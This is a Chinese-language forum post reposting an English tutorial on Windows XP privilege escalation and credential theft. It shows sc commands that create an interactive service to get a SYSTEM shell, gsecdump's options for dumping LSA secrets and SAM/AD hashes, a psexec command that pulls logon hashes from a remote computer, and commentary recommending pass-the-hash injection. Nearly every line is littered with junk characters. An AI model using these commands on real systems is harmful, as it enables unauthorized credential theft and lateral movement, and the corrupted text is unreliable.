o get a DOS Prompt as NT system:
/ j( |3 ], }3 Z4 j6 Y$ | a9 [. C( n. v7 g( ]- t7 k. T3 B. `0 i
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
m+ `4 v* t# s- g' \) h+ A[SC] CreateService SUCCESS
l- x0 z% C( h5 Z3 f, \. u+ N; V4 V% o8 S6 N
C:\>sc start shellcmdline( v( u/ X) ~( E! ^5 U+ a
[SC] StartService FAILED 1053:2 s8 q2 t9 a" U a$ H( q: } D
5 N4 ^9 W1 L6 b6 w- ?$ N! WThe service did not respond to the start or control request in a timely fashion.
4 W* s( O( A( i; L* f1 s: ?; j- Z3 k# N( |' k) i4 A
C:\>sc delete shellcmdline
% ~$ _! o1 A3 _[SC] DeleteService SUCCESS
- J3 \' E5 k% T
5 F. M: p4 Q$ b& \# c------------
7 [; t2 O' e9 ]3 P5 C- ~# _6 j$ {& [4 E0 H( h( i, g
Then in the new DOS window:( g. K3 S+ t7 h4 Z
O' U7 B P. J, H
Microsoft Windows XP [Version 5.1.2600]7 e. |1 z% s0 E) A7 g
(C) Copyright 1985-2001 Microsoft Corp.
) K- m8 q- b) O9 c: ?3 b4 p W8 v5 t _, C g9 h
C:\WINDOWS\system32>whoami2 w; H+ o% V$ y, M! ?/ q
NT AUTHORITY\SYSTEM/ A# C3 L. A0 f& g8 p
( y9 a& K7 Z+ M: tC:\WINDOWS\system32>gsecdump -h& ^. k0 S; Q( r7 S p
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
+ a" K% L; {& [/ k* ]* J: f; `7 f; Jusage: gsecdump [options]
4 M5 g5 D' }( X% T
, ^/ j# c4 S. i- joptions:& h7 [% w$ W( K& H# ?
-h [ --help ] show help
7 ?% N; g% Z7 d; s0 a, M-a [ --dump_all ] dump all secrets6 @& s& j' U+ A+ V1 [* e9 g9 I
-l [ --dump_lsa ] dump lsa secrets0 k( P, q0 j( m
-w [ --dump_wireless ] dump microsoft wireless connections7 v6 ~- i9 j9 u+ b7 Y
-u [ --dump_usedhashes ] dump hashes from active logon sessions
: a0 h' g" `! N. D) u8 r6 K-s [ --dump_hashes ] dump hashes from SAM/AD9 k1 n. Y1 l3 W' j" R
m" Q, I Y7 T; C8 i; ?- p# J
Although I like to use:
* z1 D* v0 I" s6 X! G
) U5 i Q1 D, N. K( [PsExec v1.83 - Execute processes remotely& T& Y) Y: O5 P* ?
Copyright (C) 2001-2007 Mark Russinovich
* v% c5 I7 _/ H) N. rSysinternals - 链接标记[url]www.sysinternals.com[/url]
; r4 J6 |1 B3 P& _/ {8 c0 s5 x7 P6 X0 k9 J3 Y* T
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT: l; P/ R0 @ r. a& ~% z
1 l! a4 t. D: ]4 z q6 {& ^
to get the hashes from active logon sessions of a remote system." J$ c/ h; {' Z" `
8 @7 M, \/ d. `
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
: O+ D8 p; j' h& u, Z# D" c" s( H* z- @% d" v
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
1 N4 S6 E4 I. T原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]% y5 |, O; X" r I
! |8 l- W# W1 A$ P2 x我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
6 ^$ I' e! `/ [) T |
发表于 2012-11-6 21:09:29
收藏
支持
反对